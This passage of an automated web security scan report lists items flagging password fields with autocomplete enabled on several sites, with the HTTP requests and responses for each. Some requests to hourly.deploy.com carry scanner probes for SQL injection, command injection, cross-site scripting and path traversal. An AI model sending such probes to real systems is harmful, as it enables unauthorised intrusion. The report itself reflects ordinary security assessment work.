Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 33384


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document.lo
...[SNIP]...
</form>
<form method='post' name='newcust' id='newcust' action='/app/site/backend/customerlogin.nl?newcust=T'>
<input type='hidden' name='origsc' value='4'>
...[SNIP]...
<span style="white-space: nowrap" id="pwd_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="pwd" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}if (!this.isvalid) { selectAndFocusField(this);}return this.isvalid;" name="pwd" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...
<span style="white-space: nowrap" id="newpwd2_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="newpwd2" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}if (!this.isvalid) { selectAndFocusField(this);}return this.isvalid;" name="newpwd2" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...
18.3. https://customer.kronos.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; Visitor=173%2E193%2E214%2E243; mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303740970638; s_invisit=true; s_lv=1303740970641; s_lv_s=First%20Visit; s_gpv_page=kronos%3Alabor-analysis%3Alabor-analysis-software.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:16:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>


<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...
18.4. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Default.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>


<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...
18.5. https://customer.kronos.com/user/logindenied.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/logindenied.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
</p>

<FORM name="login" action="/user/login.asp" method="post" ID="Form1">

<TABLE border="0" cellpadding="0" cellspacing="0" width="360" ID="Table2">
...[SNIP]...
<TD><INPUT type="password" name="Password" id="Password" size="25"></TD>
...[SNIP]...
18.6. http://demo.kayako.com/supportsuite/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://demo.kayako.com
Path:   /supportsuite/index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /supportsuite/index.php HTTP/1.1
Host: demo.kayako.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:41:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: SWIFT_sessionid40=3vh1b62n3zhh17dlhrf909i97f5q3akv; path=/
Connection: close
Content-Type: text/html
Content-Length: 16066


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
<td bgcolor="#F5F5F5" colspan="4"><form name="loginform" action="http://demo.kayako.com/supportsuite/index.php" method="POST"><table width="100%" border="0" cellspacing="1" cellpadding="2">
...[SNIP]...
<td><input type="password" name="loginpassword" value="" class="loginpassword"></td>
...[SNIP]...
18.7. http://direct.yandex.ru/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
</a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport.yandex.ru/passport?mode=auth&amp;amp;from=direct&amp;amp;retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" method="post"onclick="return {name: 'b-domik_type_popup', title: '', register:'', regMode:''}"
>
<input name="login"/>
<input name="passwd" type="password"/>
<input name="twoweeks" type="checkbox" value="yes"/>
...[SNIP]...
18.8. http://direct.yandex.ru/pages/direct/_direct-1303387947.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...
ion_popup-50-50")&&window.scrollTo(0,0);d.show().find("input[name=login]").focus();b(document).trigger("show.b-domik_type_popup")}function e(){b(document).unbind(".b-domik");d.hide()}function h(){d=b('<form class="'+g.attr("class").replace("g-hidden","")+'"><i class="b-domik__roof">
...[SNIP]...
<div class="b-input"><input class="b-input__text" id="b-domik_popup-password" name="passwd" value="'+g.find("input[name=passwd]").val()+'" type="password" tabindex="11"/></div>
...[SNIP]...
18.9. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1)%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.10. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.11. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%26expr+268409241%20-%202%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.12. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000F)%3C%2Fscript%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=%00%27%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00000f)%3c%2fscript%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.13. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.14. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%3E%3Cnet%20sparker=netsparker(0x000022)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x000022)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.15. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.16. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.17. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../boot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.18. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000A)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000A)%3C%2Fscript%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.19. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

